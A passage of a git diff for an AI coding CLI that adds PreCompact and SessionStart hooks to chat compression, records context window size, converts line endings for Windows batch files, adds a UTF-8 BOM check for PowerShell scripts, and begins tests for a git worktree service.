*/ +export interface RuleWithSource { + rule: PermissionRule; + type: RuleType; + scope: RuleScope; +} diff --git a/packages/core/src/services/chatCompressionService.test.ts b/packages/core/src/services/chatCompressionService.test.ts index 8f19fe9cf..074f46461 100644 --- a/packages/core/src/services/chatCompressionService.test.ts +++ b/packages/core/src/services/chatCompressionService.test.ts @@ -16,6 +16,7 @@ import { tokenLimit } from '../core/tokenLimits.js'; import type { GeminiChat } from '../core/geminiChat.js'; import type { Config } from '../config/config.js'; import type { ContentGenerator } from '../core/contentGenerator.js'; +import { SessionStartSource, PreCompactTrigger } from '../hooks/types.js'; vi.mock('../telemetry/uiTelemetry.js'); vi.mock('../core/tokenLimits.js'); @@ -107,16 +108,27 @@ describe('ChatCompressionService', () => { let mockConfig: Config; const mockModel = 'gemini-pro'; const mockPromptId = 'test-prompt-id'; + let mockFireSessionStartEvent: ReturnType<typeof vi.fn>; + let mockGetHookSystem: ReturnType<typeof vi.fn>; beforeEach(() => { service = new ChatCompressionService(); mockChat = { getHistory: vi.fn(), } as unknown as GeminiChat; + mockFireSessionStartEvent = vi.fn().mockResolvedValue(undefined); + mockGetHookSystem = vi.fn().mockReturnValue({ + fireSessionStartEvent: mockFireSessionStartEvent, + }); mockConfig = { getChatCompression: vi.fn(), getContentGenerator: vi.fn(), getContentGeneratorConfig: vi.fn().mockReturnValue({}), + getHookSystem: mockGetHookSystem, + getModel: () => 'test-model', + getDebugLogger: () => ({ + warn: vi.fn(), + }), } as unknown as Config; vi.mocked(tokenLimit).mockReturnValue(1000); @@ -274,6 +286,11 @@ describe('ChatCompressionService', () => { expect(result.newHistory).not.toBeNull(); expect(result.newHistory![0].parts![0].text).toBe('Summary'); expect(mockGenerateContent).toHaveBeenCalled(); + expect(mockGetHookSystem).toHaveBeenCalled(); + expect(mockFireSessionStartEvent).toHaveBeenCalledWith( + 
SessionStartSource.Compact, + mockModel, + ); }); it('should force compress even if under threshold', async () => { @@ -317,6 +334,10 @@ describe('ChatCompressionService', () => { expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); expect(result.newHistory).not.toBeNull(); + expect(mockFireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Compact, + mockModel, + ); }); it('should return FAILED if new token count is inflated', async () => { @@ -481,4 +502,427 @@ describe('ChatCompressionService', () => { ); expect(result.newHistory).toBeNull(); }); + + it('should not fire SessionStart event when compression fails', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue(10); + vi.mocked(tokenLimit).mockReturnValue(1000); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1, + candidatesTokenCount: 20, + totalTokenCount: 21, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + true, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe( + CompressionStatus.COMPRESSION_FAILED_INFLATED_TOKEN_COUNT, + ); + expect(result.newHistory).toBeNull(); + expect(mockFireSessionStartEvent).not.toHaveBeenCalled(); + }); + + it('should handle SessionStart hook errors gracefully', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { 
role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue(800); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + mockFireSessionStartEvent.mockRejectedValue( + new Error('SessionStart hook failed'), + ); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // Should still complete compression despite hook error + expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); + expect(result.newHistory).not.toBeNull(); + }); + + describe('PreCompact hook', () => { + let mockFirePreCompactEvent: ReturnType; + + beforeEach(() => { + mockFirePreCompactEvent = vi.fn().mockResolvedValue(undefined); + mockGetHookSystem.mockReturnValue({ + fireSessionStartEvent: mockFireSessionStartEvent, + firePreCompactEvent: mockFirePreCompactEvent, + }); + }); + + it('should fire PreCompact hook with Manual trigger when force=true', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 100, + ); + vi.mocked(tokenLimit).mockReturnValue(1000); + + const 
mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1100, + candidatesTokenCount: 50, + totalTokenCount: 1150, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + await service.compress( + mockChat, + mockPromptId, + true, // force = true -> Manual trigger + mockModel, + mockConfig, + false, + ); + + expect(mockFirePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Manual, + '', + ); + }); + + it('should fire PreCompact hook with Auto trigger when force=false', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + await service.compress( + mockChat, + mockPromptId, + false, // force = false -> Auto trigger + mockModel, + mockConfig, + false, + ); + + expect(mockFirePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Auto, + '', + ); + }); + + it('should not fire PreCompact hook when history is empty', async 
() => { + vi.mocked(mockChat.getHistory).mockReturnValue([]); + + const result = await service.compress( + mockChat, + mockPromptId, + true, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe(CompressionStatus.NOOP); + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + + it('should not fire PreCompact hook when threshold is 0', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(mockConfig.getChatCompression).mockReturnValue({ + contextPercentageThreshold: 0, + }); + + const result = await service.compress( + mockChat, + mockPromptId, + true, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe(CompressionStatus.NOOP); + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + + it('should not fire PreCompact hook when under threshold and not forced', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 600, + ); + vi.mocked(tokenLimit).mockReturnValue(1000); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + expect(result.info.compressionStatus).toBe(CompressionStatus.NOOP); + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + + it('should handle PreCompact hook errors gracefully', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + 
vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + mockFirePreCompactEvent.mockRejectedValue( + new Error('PreCompact hook failed'), + ); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // Should still complete compression despite hook error + expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); + expect(result.newHistory).not.toBeNull(); + expect(mockFirePreCompactEvent).toHaveBeenCalled(); + }); + + it('should fire PreCompact hook before compression and SessionStart after', async () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + const callOrder: string[] = []; + mockFirePreCompactEvent.mockImplementation(async () => { + callOrder.push('PreCompact'); + }); + mockFireSessionStartEvent.mockImplementation(async () => { + callOrder.push('SessionStart'); + }); + + const mockGenerateContent = 
vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // PreCompact should be called before SessionStart + expect(callOrder).toEqual(['PreCompact', 'SessionStart']); + }); + + it('should not fire PreCompact hook when hookSystem is null', async () => { + mockGetHookSystem.mockReturnValue(null); + + const history: Content[] = [ + { role: 'user', parts: [{ text: 'msg1' }] }, + { role: 'model', parts: [{ text: 'msg2' }] }, + { role: 'user', parts: [{ text: 'msg3' }] }, + { role: 'model', parts: [{ text: 'msg4' }] }, + ]; + vi.mocked(mockChat.getHistory).mockReturnValue(history); + vi.mocked(uiTelemetryService.getLastPromptTokenCount).mockReturnValue( + 800, + ); + vi.mocked(mockConfig.getContentGeneratorConfig).mockReturnValue({ + model: 'gemini-pro', + contextWindowSize: 1000, + } as unknown as ReturnType); + + const mockGenerateContent = vi.fn().mockResolvedValue({ + candidates: [ + { + content: { + parts: [{ text: 'Summary' }], + }, + }, + ], + usageMetadata: { + promptTokenCount: 1600, + candidatesTokenCount: 50, + totalTokenCount: 1650, + }, + } as unknown as GenerateContentResponse); + vi.mocked(mockConfig.getContentGenerator).mockReturnValue({ + generateContent: mockGenerateContent, + } as unknown as ContentGenerator); + + const result = await service.compress( + mockChat, + mockPromptId, + false, + mockModel, + mockConfig, + false, + ); + + // Should still complete compression without hook + expect(result.info.compressionStatus).toBe(CompressionStatus.COMPRESSED); + expect(result.newHistory).not.toBeNull(); + // 
mockFirePreCompactEvent should not be called since hookSystem is null + expect(mockFirePreCompactEvent).not.toHaveBeenCalled(); + }); + }); }); diff --git a/packages/core/src/services/chatCompressionService.ts b/packages/core/src/services/chatCompressionService.ts index 3a89ee103..082971671 100644 --- a/packages/core/src/services/chatCompressionService.ts +++ b/packages/core/src/services/chatCompressionService.ts @@ -14,6 +14,7 @@ import { getCompressionPrompt } from '../core/prompts.js'; import { getResponseText } from '../utils/partUtils.js'; import { logChatCompression } from '../telemetry/loggers.js'; import { makeChatCompressionEvent } from '../telemetry/types.js'; +import { SessionStartSource, PreCompactTrigger } from '../hooks/types.js'; /** * Threshold for compression token count as a fraction of the model's token limit. @@ -124,6 +125,17 @@ export class ChatCompressionService { } } + // Fire PreCompact hook before compression begins + const hookSystem = config.getHookSystem(); + if (hookSystem) { + const trigger = force ? PreCompactTrigger.Manual : PreCompactTrigger.Auto; + try { + await hookSystem.firePreCompactEvent(trigger, ''); + } catch (err) { + config.getDebugLogger().warn(`PreCompact hook failed: ${err}`); + } + } + const splitPoint = findCompressSplitPoint( curatedHistory, 1 - COMPRESSION_PRESERVE_THRESHOLD, @@ -261,6 +273,16 @@ export class ChatCompressionService { }; } else { uiTelemetryService.setLastPromptTokenCount(newTokenCount); + + // Fire SessionStart event after successful compression + try { + await config + .getHookSystem() + ?.fireSessionStartEvent(SessionStartSource.Compact, model ?? 
''); + } catch (err) { + config.getDebugLogger().warn(`SessionStart hook failed: ${err}`); + } + return { newHistory: extraHistory, info: { diff --git a/packages/core/src/services/chatRecordingService.ts b/packages/core/src/services/chatRecordingService.ts index 795ac1fe5..14f2f5ba7 100644 --- a/packages/core/src/services/chatRecordingService.ts +++ b/packages/core/src/services/chatRecordingService.ts @@ -81,6 +81,8 @@ export interface ChatRecord { usageMetadata?: GenerateContentResponseUsageMetadata; /** Model used for this response */ model?: string; + /** Context window size of the model used for this response */ + contextWindowSize?: number; /** * Tool call metadata for UI recovery. * Contains enriched info (displayName, status, result, etc.) not in API format. @@ -299,12 +301,14 @@ export class ChatRecordingService { * @param data.message The raw PartListUnion object from the model response * @param data.model The model name * @param data.tokens Token usage statistics + * @param data.contextWindowSize Context window size of the model * @param data.toolCallsMetadata Enriched tool call info for UI recovery */ recordAssistantTurn(data: { model: string; message?: PartListUnion; tokens?: GenerateContentResponseUsageMetadata; + contextWindowSize?: number; }): void { try { const record: ChatRecord = { @@ -320,6 +324,10 @@ export class ChatRecordingService { record.usageMetadata = data.tokens; } + if (data.contextWindowSize !== undefined) { + record.contextWindowSize = data.contextWindowSize; + } + this.appendRecord(record); } catch (error) { debugLogger.error('Error saving assistant turn:', error); diff --git a/packages/core/src/services/fileSystemService.test.ts b/packages/core/src/services/fileSystemService.test.ts index 66446d7e2..7811a96ed 100644 --- a/packages/core/src/services/fileSystemService.test.ts +++ b/packages/core/src/services/fileSystemService.test.ts @@ -6,9 +6,27 @@ import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; import fs 
from 'node:fs/promises'; -import { StandardFileSystemService } from './fileSystemService.js'; +import { + StandardFileSystemService, + needsUtf8Bom, + resetUtf8BomCache, +} from './fileSystemService.js'; + +const mockPlatform = vi.hoisted(() => vi.fn().mockReturnValue('linux')); +const mockGetSystemEncoding = vi.hoisted(() => + vi.fn().mockReturnValue('utf-8'), +); vi.mock('fs/promises'); +vi.mock('os', () => ({ + default: { + platform: mockPlatform, + }, + platform: mockPlatform, +})); +vi.mock('../utils/systemEncoding.js', () => ({ + getSystemEncoding: mockGetSystemEncoding, +})); vi.mock('../utils/fileUtils.js', async (importOriginal) => { const actual = await importOriginal(); @@ -25,6 +43,9 @@ describe('StandardFileSystemService', () => { beforeEach(() => { vi.resetAllMocks(); + resetUtf8BomCache(); + mockPlatform.mockReturnValue('linux'); + mockGetSystemEncoding.mockReturnValue('utf-8'); fileSystem = new StandardFileSystemService(); }); @@ -254,5 +275,177 @@ describe('StandardFileSystemService', () => { // First two bytes should NOT be FF FE (the UTF-16LE BOM) expect(!(buf[0] === 0xff && buf[1] === 0xfe)).toBe(true); }); + + it('should convert LF to CRLF when writing .bat files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: '@echo off\necho hello\nexit /b 0\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + '@echo off\r\necho hello\r\nexit /b 0\r\n', + 'utf-8', + ); + }); + + it('should convert LF to CRLF when writing .cmd files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.cmd', + content: '@echo off\necho hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.cmd', + '@echo off\r\necho hello\r\n', + 'utf-8', + ); + }); + + it('should not 
double-convert existing CRLF in .bat files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: '@echo off\r\necho hello\r\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + '@echo off\r\necho hello\r\n', + 'utf-8', + ); + }); + + it('should handle mixed line endings in .bat files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: 'line1\r\nline2\nline3\r\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + 'line1\r\nline2\r\nline3\r\n', + 'utf-8', + ); + }); + + it('should be case-insensitive for .BAT extension on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/SCRIPT.BAT', + content: 'echo hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/SCRIPT.BAT', + 'echo hello\r\n', + 'utf-8', + ); + }); + + it('should not convert line endings for non-.bat/.cmd files on Windows', async () => { + mockPlatform.mockReturnValue('win32'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.sh', + content: '#!/bin/bash\necho hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.sh', + '#!/bin/bash\necho hello\n', + 'utf-8', + ); + }); + + it('should not convert line endings for .bat files on non-Windows', async () => { + mockPlatform.mockReturnValue('darwin'); + vi.mocked(fs.writeFile).mockResolvedValue(); + + await fileSystem.writeTextFile({ + path: '/test/script.bat', + content: '@echo off\necho hello\n', + }); + + expect(fs.writeFile).toHaveBeenCalledWith( + '/test/script.bat', + '@echo off\necho hello\n', + 'utf-8', + ); + }); + }); + 
+ describe('needsUtf8Bom', () => { + beforeEach(() => { + resetUtf8BomCache(); + }); + + it('should return true for .ps1 files on Windows with non-UTF-8 code page', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(true); + }); + + it('should return true for .PS1 files (case-insensitive)', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + expect(needsUtf8Bom('/test/SCRIPT.PS1')).toBe(true); + }); + + it('should return false for .ps1 files on Windows with UTF-8 code page', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('utf-8'); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(false); + }); + + it('should return false for .ps1 files on non-Windows', () => { + mockPlatform.mockReturnValue('darwin'); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(false); + }); + + it('should return false for non-.ps1 files on Windows with non-UTF-8 code page', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + expect(needsUtf8Bom('/test/script.sh')).toBe(false); + expect(needsUtf8Bom('/test/file.txt')).toBe(false); + expect(needsUtf8Bom('/test/script.bat')).toBe(false); + }); + + it('should cache the platform/encoding check across calls', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue('gbk'); + + needsUtf8Bom('/test/script.ps1'); + needsUtf8Bom('/test/other.ps1'); + + // getSystemEncoding should only be called once due to caching + expect(mockGetSystemEncoding).toHaveBeenCalledTimes(1); + }); + + it('should treat null system encoding as non-UTF-8', () => { + mockPlatform.mockReturnValue('win32'); + mockGetSystemEncoding.mockReturnValue(null); + + expect(needsUtf8Bom('/test/script.ps1')).toBe(true); + }); }); }); diff --git a/packages/core/src/services/fileSystemService.ts 
b/packages/core/src/services/fileSystemService.ts index a5017621a..6d2022c75 100644 --- a/packages/core/src/services/fileSystemService.ts +++ b/packages/core/src/services/fileSystemService.ts @@ -5,6 +5,7 @@ */ import fs from 'node:fs/promises'; +import os from 'node:os'; import * as path from 'node:path'; import { globSync } from 'glob'; import { readFileWithLineAndLimit } from '../utils/fileUtils.js'; @@ -13,6 +14,7 @@ import { iconvEncodingExists, isUtf8CompatibleEncoding, } from '../utils/iconvHelper.js'; +import { getSystemEncoding } from '../utils/systemEncoding.js'; import type { ReadTextFileRequest, WriteTextFileRequest, @@ -83,6 +85,75 @@ export interface WriteTextFileOptions { encoding?: string; } +/** + * File extensions that require CRLF (\r\n) line endings to function correctly. + * cmd.exe parses .bat/.cmd files using CRLF delimiters; LF-only endings can + * break multi-line constructs, labels, and goto statements. + */ +const CRLF_EXTENSIONS = new Set(['.bat', '.cmd']); + +/** + * File extensions that need UTF-8 BOM on Windows with a non-UTF-8 code page. + * PowerShell 5.1 (the version that ships with Windows) reads BOM-less files + * using the system's ANSI code page. Without a BOM, any non-ASCII characters + * in the script will be misinterpreted (e.g. on a GBK system). PowerShell 7+ + * defaults to UTF-8 and handles BOM fine, so adding BOM is always safe. + */ +const UTF8_BOM_EXTENSIONS = new Set(['.ps1']); + +// Cache so we only call getSystemEncoding() once per process +let cachedIsNonUtf8Windows: boolean | undefined; + +/** + * Returns true if a newly created file at the given path should be written + * with a UTF-8 BOM. Conditions (all must be true): + * 1. Running on Windows + * 2. System code page is not UTF-8 + * 3. File extension is in UTF8_BOM_EXTENSIONS (e.g. 
.ps1) + */ +export function needsUtf8Bom(filePath: string): boolean { + const extension = path.extname(filePath).toLowerCase(); + if (!UTF8_BOM_EXTENSIONS.has(extension)) { + return false; + } + if (cachedIsNonUtf8Windows !== undefined) { + return cachedIsNonUtf8Windows; + } + // First relevant call since the last reset: probe the platform, and only + // query the system encoding when actually running on Windows. + const onWindows = os.platform() === 'win32'; + const nonUtf8Windows = onWindows && getSystemEncoding() !== 'utf-8'; + cachedIsNonUtf8Windows = nonUtf8Windows; + return nonUtf8Windows; +} + +/** + * Clears the memoized platform/encoding result so the next needsUtf8Bom() call recomputes it; intended for tests. + */ +export function resetUtf8BomCache(): void { + cachedIsNonUtf8Windows = undefined; +} + +/** + * Tells whether the file at `filePath` must be written with CRLF line endings. + * Always false off Windows; on Windows it is decided by the (case-insensitive) extension. + */ +function needsCrlfLineEndings(filePath: string): boolean { + const onWindows = os.platform() === 'win32'; + if (!onWindows) { + return false; + } + return CRLF_EXTENSIONS.has(path.extname(filePath).toLowerCase()); +} + +/** + * Rewrites every line break in `content` as CRLF. A single pass matches both + * bare \n and existing \r\n, so already-correct CRLF pairs are not doubled. + */ +function ensureCrlfLineEndings(content: string): string { + return content.replace(/\r?\n/g, '\r\n'); +} + /** * Return the BOM byte sequence for a given encoding name, or null if the * encoding does not use a standard BOM. Used when writing back a file that @@ -129,7 +200,11 @@ export class StandardFileSystemService implements FileSystemService { async writeTextFile( params: Omit, ): Promise { - const { content, path: filePath, _meta } = params; + const { path: filePath, _meta } = params; + // Convert LF to CRLF for file types that require it (e.g. .bat, .cmd) + const content = needsCrlfLineEndings(filePath) + ? ensureCrlfLineEndings(params.content) + : params.content; const bom = _meta?.['bom'] ??
(false as boolean); const encoding = _meta?.['encoding'] as string | undefined; diff --git a/packages/core/src/services/gitWorktreeService.test.ts b/packages/core/src/services/gitWorktreeService.test.ts new file mode 100644 index 000000000..f34eb1ca2 --- /dev/null +++ b/packages/core/src/services/gitWorktreeService.test.ts @@ -0,0 +1,503 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { beforeEach, describe, expect, it, vi } from 'vitest'; +import type { Mock } from 'vitest'; +import type * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { GitWorktreeService } from './gitWorktreeService.js'; +import { isCommandAvailable } from '../utils/shell-utils.js'; + +const hoistedMockSimpleGit = vi.hoisted(() => vi.fn()); +const hoistedMockCheckIsRepo = vi.hoisted(() => vi.fn()); +const hoistedMockInit = vi.hoisted(() => vi.fn()); +const hoistedMockAdd = vi.hoisted(() => vi.fn()); +const hoistedMockCommit = vi.hoisted(() => vi.fn()); +const hoistedMockRevparse = vi.hoisted(() => vi.fn()); +const hoistedMockRaw = vi.hoisted(() => vi.fn()); +const hoistedMockBranch = vi.hoisted(() => vi.fn()); +const hoistedMockDiff = vi.hoisted(() => vi.fn()); +const hoistedMockMerge = vi.hoisted(() => vi.fn()); +const hoistedMockStash = vi.hoisted(() => vi.fn()); + +vi.mock('simple-git', () => ({ + simpleGit: hoistedMockSimpleGit, + CheckRepoActions: { IS_REPO_ROOT: 'is-repo-root' }, +})); + +vi.mock('../utils/shell-utils.js', () => ({ + isCommandAvailable: vi.fn(), +})); + +const hoistedMockGetGlobalQwenDir = vi.hoisted(() => vi.fn()); +vi.mock('../config/storage.js', () => ({ + Storage: { + getGlobalQwenDir: hoistedMockGetGlobalQwenDir, + }, +})); + +const hoistedMockFsMkdir = vi.hoisted(() => vi.fn()); +const hoistedMockFsAccess = vi.hoisted(() => vi.fn()); +const hoistedMockFsWriteFile = vi.hoisted(() => vi.fn()); +const hoistedMockFsReaddir = vi.hoisted(() => vi.fn()); +const hoistedMockFsStat = 
vi.hoisted(() => vi.fn()); +const hoistedMockFsRm = vi.hoisted(() => vi.fn()); +const hoistedMockFsReadFile = vi.hoisted(() => vi.fn()); + +vi.mock('node:fs/promises', async (importOriginal) => { + const actual = await importOriginal<typeof fs>(); + return { + ...actual, + mkdir: hoistedMockFsMkdir, + access: hoistedMockFsAccess, + writeFile: hoistedMockFsWriteFile, + readdir: hoistedMockFsReaddir, + stat: hoistedMockFsStat, + rm: hoistedMockFsRm, + readFile: hoistedMockFsReadFile, + }; +}); + +describe('GitWorktreeService', () => { + beforeEach(() => { + vi.clearAllMocks(); + + hoistedMockGetGlobalQwenDir.mockReturnValue('/mock-qwen'); + (isCommandAvailable as Mock).mockReturnValue({ available: true }); + + hoistedMockSimpleGit.mockImplementation(() => ({ + checkIsRepo: hoistedMockCheckIsRepo, + init: hoistedMockInit, + add: hoistedMockAdd, + commit: hoistedMockCommit, + revparse: hoistedMockRevparse, + raw: hoistedMockRaw, + branch: hoistedMockBranch, + diff: hoistedMockDiff, + merge: hoistedMockMerge, + stash: hoistedMockStash, + })); + + hoistedMockCheckIsRepo.mockResolvedValue(true); + hoistedMockInit.mockResolvedValue(undefined); + hoistedMockAdd.mockResolvedValue(undefined); + hoistedMockCommit.mockResolvedValue(undefined); + hoistedMockRevparse.mockResolvedValue('main\n'); + hoistedMockRaw.mockResolvedValue(''); + hoistedMockBranch.mockResolvedValue({ branches: {} }); + hoistedMockDiff.mockResolvedValue(''); + hoistedMockMerge.mockResolvedValue(undefined); + hoistedMockStash.mockResolvedValue(''); + + hoistedMockFsMkdir.mockResolvedValue(undefined); + hoistedMockFsAccess.mockRejectedValue({ code: 'ENOENT' }); + hoistedMockFsWriteFile.mockResolvedValue(undefined); + hoistedMockFsReaddir.mockResolvedValue([]); + hoistedMockFsStat.mockResolvedValue({ birthtimeMs: 123 }); + hoistedMockFsRm.mockResolvedValue(undefined); + hoistedMockFsReadFile.mockResolvedValue('{}'); + }); + + it('checkGitAvailable should return an error when git is unavailable', async () => { +
(isCommandAvailable as Mock).mockReturnValue({ available: false }); + const service = new GitWorktreeService('/repo'); + + await expect(service.checkGitAvailable()).resolves.toEqual({ + available: false, + error: 'Git is not installed. Please install Git.', + }); + }); + + it('isGitRepository should fallback to checkIsRepo() when root check throws', async () => { + hoistedMockCheckIsRepo + .mockRejectedValueOnce(new Error('root check failed')) + .mockResolvedValueOnce(true); + const service = new GitWorktreeService('/repo'); + + await expect(service.isGitRepository()).resolves.toBe(true); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(1, 'is-repo-root'); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(2); + }); + + it('isGitRepository should detect subdirectory inside an existing repo', async () => { + // IS_REPO_ROOT returns false for a subdirectory, but checkIsRepo() + // (without params) returns true because we're inside a repo. + hoistedMockCheckIsRepo + .mockResolvedValueOnce(false) + .mockResolvedValueOnce(true); + const service = new 